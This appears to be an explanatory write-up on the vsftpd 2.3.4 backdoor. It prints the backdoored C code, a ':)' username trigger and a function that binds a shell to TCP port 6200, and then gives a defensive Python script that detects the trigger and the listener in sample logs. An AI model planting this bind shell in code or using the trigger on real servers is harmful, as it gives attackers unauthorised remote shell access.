Description: The backdoor affects specifically version 2.3.4 of the popular FTP daemon vsftpd and lives in the str.c file, which holds the string-manipulation routines.
### str.c ###
int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
    {
      return 1;
    }
    /* backdoor trigger: 0x3a 0x29 is the ASCII sequence ":)" */
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
    {
      vsf_sysutil_extra();
    }
  }
  return 0;
}
While parsing the received string values, if the string begins with "\x3A\x29", which in ASCII is ':)' (a smiley face), the code invokes vsf_sysutil_extra().
This backdoor function was placed in the sysdeputil.c file and looks like this:
### sysdeputil.c ###
int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    exit(1);
  /* listen on TCP port 6200 on all interfaces */
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
           sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  {
    rfd = accept(fd, 0, 0);
    /* wire the accepted connection to stdin/stdout/stderr and run a shell */
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0);
  }
}
It simply opens a new TCP socket listening on port 6200 (bound to all interfaces) and, for each accepted connection, redirects stdin, stdout and stderr to that connection and executes /bin/sh, so whoever connects to the port gets a shell.
So, by using ':)' as the username, the attackers were able to trigger this backdoor in vsftpd 2.3.4.
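Two artifacts of this backdoor are visible to a defender: the ':)' sequence arriving in a USER command on the control channel, and a listening socket on TCP 6200 owned by the FTP daemon. The following Python script is an added example (not code from the page or from the vsftpd project) that checks for both over constructed sample data. The log lines approximate the format of vsftpd's verbose protocol log and the `ss -tlnp` output format, both made up for this example; the function names, the sample addresses and pids are assumptions. The USER check flags ':)' anywhere in the argument, a superset of the "begins with" condition described above, since a broader match costs nothing on the detection side.

```python
import re
from typing import Dict, FrozenSet, Iterable, List

# Byte sequence the backdoored str_contains_line() compares against:
# 0x3a 0x29, i.e. the ASCII characters ":)".
TRIGGER = "\x3a\x29"

# Constructed sample lines in the shape of vsftpd's verbose protocol log
# (log_ftp_protocol=YES). Addresses and pids are made up.
SAMPLE_FTP_LOG = """\
Tue Jan  1 10:00:01 2013 [pid 1234] CONNECT: Client "192.0.2.10"
Tue Jan  1 10:00:02 2013 [pid 1234] FTP command: Client "192.0.2.10", "USER alice"
Tue Jan  1 10:00:03 2013 [pid 1234] FTP command: Client "192.0.2.10", "PASS <password>"
Tue Jan  1 10:00:09 2013 [pid 1240] CONNECT: Client "198.51.100.7"
Tue Jan  1 10:00:10 2013 [pid 1240] FTP command: Client "198.51.100.7", "USER bob:)"
Tue Jan  1 10:00:11 2013 [pid 1240] FTP command: Client "198.51.100.7", "PASS x"
"""

# Constructed sample in the shape of `ss -tlnp` output on the FTP host.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*          users:(("vsftpd",pid=1200,fd=3))
LISTEN  0       128     127.0.0.1:25        0.0.0.0:*          users:(("master",pid=900,fd=13))
LISTEN  0       100     0.0.0.0:6200        0.0.0.0:*          users:(("vsftpd",pid=1240,fd=4))
"""

FTP_USER_RE = re.compile(
    r'FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"')

SS_LISTEN_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')


def find_trigger_attempts(log_lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per USER command whose argument contains ':)'."""
    hits = []
    for line in log_lines:
        m = FTP_USER_RE.search(line)
        if m and TRIGGER in m.group("user"):
            hits.append({"client": m.group("client"), "user": m.group("user")})
    return hits


def find_unexpected_listeners(ss_lines: Iterable[str],
                              expected_ports: FrozenSet[int] = frozenset({21}),
                              process: str = "vsftpd") -> List[Dict[str, object]]:
    """Return listening sockets owned by `process` on ports outside the expected set.

    For the backdoor on this page the tell is a vsftpd-owned listener on 6200;
    the port set is a parameter so the same check covers other daemons."""
    found = []
    for line in ss_lines:
        m = SS_LISTEN_RE.match(line)
        if not m or m.group("proc") != process:
            continue
        port = int(m.group("port"))
        if port not in expected_ports:
            found.append({"port": port, "proc": m.group("proc"),
                          "pid": int(m.group("pid"))})
    return found


if __name__ == "__main__":
    for hit in find_trigger_attempts(SAMPLE_FTP_LOG.splitlines()):
        print("trigger sequence in USER from %(client)s: %(user)r" % hit)
    for sock in find_unexpected_listeners(SAMPLE_SS.splitlines()):
        print("unexpected %(proc)s listener on port %(port)d (pid %(pid)d)" % sock)
```

On a real host the second check would be fed the live output of `ss -tlnp` (or `netstat -tlnp`) rather than the constructed sample, and the first check the daemon's actual log; the regexes only need adjusting if the local log format differs from the vsftpd-style lines assumed here.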
Tags: Metasploitable 2, vsftpd, backdoor, Hacking, Hacker, Japtron, José Antonio Pérez